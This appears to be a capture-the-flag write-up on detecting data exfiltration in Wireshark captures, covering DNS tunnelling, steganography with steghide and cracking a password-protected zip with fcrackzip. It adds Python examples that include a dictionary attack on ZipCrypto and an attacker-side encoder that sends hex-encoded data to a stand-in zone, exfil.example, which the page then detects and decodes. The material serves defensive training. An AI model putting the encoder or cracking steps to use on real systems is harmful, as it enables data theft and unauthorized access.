Data Elf-iltration

Data Exfiltration Techniques


Last updated 5 years ago


Companies deploy Data Loss Prevention (DLP) systems to stop data exfiltration, the transfer of data out of a network without authorization. DLP systems are not perfect and can let classified data leave the network. This is where the Security Operations Center (SOC) comes in.

Part of the job of a SOC Tier 1 analyst is to determine whether an attack actually occurred, which can be done in many ways. An easy way is to review packet captures from the network in Wireshark and look for known data exfiltration techniques. It is easier to spot data that we know should not be leaving the network than to determine whether an Advanced Persistent Threat (APT) is inside. APTs can hide deep inside a network, often abusing Kerberos and its ticket-granting service to keep persistent access.

Some Data Exfiltration techniques include:

  • DNS

  • FTP/SFTP based file transfer

  • SMB based file transfer

  • HTTP/HTTPS

  • Steganographic methods, like hiding data within images

  • ICMP

  • And many more

As long as the exfiltration is not happening over an encrypted protocol, spotting it in Wireshark can be very simple. DNS is one of the most common exfiltration channels, mainly because it blends in with normal traffic: nearly every device on the network makes DNS queries, so malicious queries are hard to distinguish from legitimate ones.

An attacker can register a domain whose name server they control, encode the stolen data into subdomain labels, and have the server record every query for anything other than www to a file, to be reassembled and examined later. Because the victim's own resolver forwards the query on the attacker's behalf, the victim never has to connect to the attacker directly.

Another technique is steganography, hiding data inside an image. The attacker may embed a hidden file within an image using a utility like Steghide (not preinstalled on Kali; the same tool extracts the data again). If we notice that a specific IP requested a specific, seemingly random image (like Google's logo on a website that is not Google), we may choose to investigate.

We can carve the image out of the capture in Wireshark via File -> Export Objects -> HTTP and selecting google.jpg.

Then we can try to extract any hidden contents with Steghide, which prompts for the passphrase (press Enter for an empty one, or pass it with -p):

steghide extract -sf ./<file to extract>.jpg

As long as the file was transferred in cleartext over HTTP, TFTP, FTP, or SMB, it can be carved out of the packet capture. Some attackers obfuscate the data further by placing it in a password-protected zip file. Luckily for us, there are tools like fcrackzip (not preinstalled on Kali) that let us run a dictionary or brute-force attack against the archive. The syntax is as follows:

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt -v ./file.zip

-D selects dictionary mode and -p the wordlist to read candidates from (-b would select brute-force mode instead), -v makes the output verbose, and -u tells fcrackzip to verify every hit by actually unzipping with it. The -u flag matters: the quick check fcrackzip does otherwise only tests a single check byte in the encryption header, so about one wrong password in 256 is reported as a false positive.
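To show what the dictionary attack above actually does, and why the one-byte check needs the -u verification, here is an added example written for this page (not code from the room or from fcrackzip). It implements the encrypt side of ZipCrypto (traditional PKWARE encryption) to build a password-protected archive in memory, since Python's zipfile can only read such entries, then runs a wordlist against it using zipfile as the decryptor. The list contents, the password 'reindeer' and the mini wordlist are constructed stand-ins for the room's zip and rockyou.txt.

```python
"""Added example, not from the original write-up: a dictionary attack on a
ZipCrypto (traditional PKWARE) protected archive, which is what fcrackzip -D
does, built from the standard library only. Because zipfile cannot write
encrypted entries, the archive is assembled by hand here. The password
'reindeer', the list contents and the mini wordlist are constructed
assumptions standing in for the room's zip and rockyou.txt."""
import io
import os
import struct
import zipfile
import zlib
from typing import List, Optional, Tuple


def _crc32_byte(crc: int, b: int) -> int:
    """One CRC-32 table step (polynomial 0xEDB88320), as used by the ZipCrypto key schedule."""
    c = (crc ^ b) & 0xFF
    for _ in range(8):
        c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
    return c ^ (crc >> 8)


class ZipCrypto:
    """Encrypt side of traditional PKWARE encryption; Python's zipfile has the decrypt side."""

    def __init__(self, password: bytes):
        self.k = [0x12345678, 0x23456789, 0x34567890]
        for ch in password:
            self._update(ch)

    def _update(self, ch: int) -> None:
        self.k[0] = _crc32_byte(self.k[0], ch)
        self.k[1] = ((self.k[1] + (self.k[0] & 0xFF)) * 134775813 + 1) & 0xFFFFFFFF
        self.k[2] = _crc32_byte(self.k[2], self.k[1] >> 24)

    def encrypt(self, plain: bytes) -> bytes:
        out = bytearray()
        for p in plain:
            t = (self.k[2] | 2) & 0xFFFF
            out.append(p ^ (((t * (t ^ 1)) >> 8) & 0xFF))
            self._update(p)                     # keystream is driven by the plaintext
        return bytes(out)


def make_encrypted_zip(name: str, data: bytes, password: bytes) -> bytes:
    """One stored, encrypted entry: local header, 12-byte crypto header + data, central dir, EOCD."""
    crc = zlib.crc32(data) & 0xFFFFFFFF
    zc = ZipCrypto(password)
    # the last header byte is the high byte of the CRC: the one-byte 'check byte' crackers test first
    body = zc.encrypt(os.urandom(11) + bytes([crc >> 24])) + zc.encrypt(data)
    fname = name.encode()
    flags, method, dostime, dosdate = 0x0001, 0, 0, 0x0021   # encrypted, stored, 1980-01-01
    local = struct.pack("<IHHHHHIIIHH", 0x04034B50, 20, flags, method, dostime, dosdate,
                        crc, len(body), len(data), len(fname), 0) + fname
    central = struct.pack("<IHHHHHHIIIHHHHHII", 0x02014B50, 20, 20, flags, method, dostime,
                          dosdate, crc, len(body), len(data), len(fname), 0, 0, 0, 0, 0, 0) + fname
    eocd = struct.pack("<IHHHHIIH", 0x06054B50, 0, 0, 1, 1, len(central), len(local) + len(body), 0)
    return local + body + central + eocd


def crack_zip(blob: bytes, name: str, wordlist: List[bytes]) -> Tuple[Optional[bytes], int]:
    """Dictionary attack like fcrackzip -D -u. Returns (password or None, check-byte false positives)."""
    false_positives = 0
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for pwd in wordlist:
            try:
                with zf.open(name, pwd=pwd) as f:
                    f.read()                    # forces the full CRC check, i.e. what -u adds
                return pwd, false_positives
            except RuntimeError:                # check byte mismatch: the cheap 1-byte test
                continue
            except zipfile.BadZipFile:          # check byte matched (1 in 256 chance) but CRC failed;
                false_positives += 1            # without -u fcrackzip would print this candidate
    return None, false_positives


def extract_with(blob: bytes, name: str, password: bytes) -> bytes:
    """Pull the entry out once the password is known."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        return zf.read(name, pwd=password)


# Constructed sample standing in for the room's zip and rockyou.txt
SECRET = b"Timmy's list: a telescope, a red bike, a puppy named Rudolph\n"
PASSWORD = b"reindeer"
WORDLIST = [b"password", b"123456", b"santa", b"christmas", b"reindeer", b"elf"]
ARCHIVE = make_encrypted_zip("christmaslisttimmy.txt", SECRET, PASSWORD)
```

Running `crack_zip(ARCHIVE, "christmaslisttimmy.txt", WORDLIST)` returns `(b"reindeer", n)` where n counts the candidates that passed the check byte by chance and only failed at the CRC. That second path is exactly the false positive fcrackzip reports when run without -u, which is why the verification flag belongs in the command.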

Filtering the pcap for DNS packets, we notice data being exfiltrated in the query names.

The data is hex encoded; converting it to ASCII gives us the answer.
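The following added example (written for this page, not code from the room) makes both the DNS channel described earlier and the hex-decoding step concrete: it shows the attacker side encoding a file into query names, the raw DNS packets that produces, and the analyst side parsing the query names back out of the packets, flagging the suspicious ones and decoding the hex. The attacker zone exfil.example, the label layout and the captured traffic are all constructed assumptions.

```python
"""Added example, not from the original write-up: what DNS exfiltration looks
like on the wire and how to pull the data back out of the query names.

Assumptions (not from the room): the attacker controls the zone exfil.example
and sends each chunk hex-encoded as the left-most label, followed by a sequence
number label, e.g. 54696d6d79.0.exfil.example. All traffic below is constructed."""
import binascii
import struct
from collections import defaultdict

ATTACKER_ZONE = "exfil.example"   # assumed attacker-controlled domain
CHUNK = 30                        # 30 bytes -> 60 hex chars, under the 63-byte label limit


def encode_exfil_queries(data: bytes, zone: str = ATTACKER_ZONE) -> list:
    """Attacker side: split the file into chunks, hex-encode each as a subdomain label."""
    return [
        f"{binascii.hexlify(data[i:i + CHUNK]).decode()}.{i // CHUNK}.{zone}"
        for i in range(0, len(data), CHUNK)
    ]


def build_dns_query(qname: str, txid: int = 0x1337) -> bytes:
    """Minimal DNS query in wire format: header, QNAME labels, QTYPE=A, QCLASS=IN."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)   # flags 0x0100 = recursion desired
    qname_wire = b"".join(bytes([len(label)]) + label.encode() for label in qname.split("."))
    return header + qname_wire + b"\x00" + struct.pack("!HH", 1, 1)


def parse_qname(packet: bytes) -> str:
    """Analyst side: read the label sequence that follows the 12-byte DNS header."""
    pos, labels = 12, []
    while packet[pos] != 0:
        n = packet[pos]
        if n & 0xC0:   # compression pointers never appear in a question name
            raise ValueError("compressed name in question section")
        labels.append(packet[pos + 1:pos + 1 + n].decode("ascii"))
        pos += 1 + n
    return ".".join(labels)


def is_hex_label(label: str) -> bool:
    """Long, even-length, all-hex labels are the signature of the encoding used here."""
    return len(label) >= 16 and len(label) % 2 == 0 and all(c in "0123456789abcdef" for c in label)


def detect_and_decode(qnames: list) -> dict:
    """Group suspicious names by zone, order chunks by sequence label, decode the hex."""
    chunks = defaultdict(dict)
    for name in qnames:
        labels = name.split(".")
        if len(labels) < 4 or not is_hex_label(labels[0]) or not labels[1].isdigit():
            continue
        chunks[".".join(labels[2:])][int(labels[1])] = binascii.unhexlify(labels[0])
    # a single hex label could be a CDN hash or cache-buster; two or more in one zone is the tell
    return {zone: b"".join(parts[i] for i in sorted(parts))
            for zone, parts in chunks.items() if len(parts) >= 2}


def recover_from_capture(packets: list) -> dict:
    """Full analyst pipeline: parse every query name, then detect and decode."""
    return detect_and_decode([parse_qname(p) for p in packets])


# Constructed traffic: benign queries (one with a lone hex label) mixed with the exfil queries.
SECRET = b"Timmy wants a telescope, a red bike and a puppy\n"
BENIGN = ["www.google.com", "mail.example.org", "e3b0c44298fc1c149afb.3.cache.example"]
CAPTURED = [build_dns_query(q) for q in BENIGN + encode_exfil_queries(SECRET)]
```

`recover_from_capture(CAPTURED)` returns `{"exfil.example": SECRET}`: the two benign three-label names are skipped outright, the lone hex label under cache.example is dropped by the two-or-more rule, and the two chunks under exfil.example are reordered by their sequence label and decoded. In a real capture, the `qnames` list is what a Wireshark `dns.qry.name` column or `tshark -T fields -e dns.qry.name` gives you.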

Exporting the HTTP objects from the capture gives us an image, a zip file and a text/html file.

Using fcrackzip we find the password for the zip file.

Inside it we find the christmaslisttimmy.txt file, which has the answer.

Using steghide we extract the hidden contents of the TryHackMe.jpg file and reveal the answer.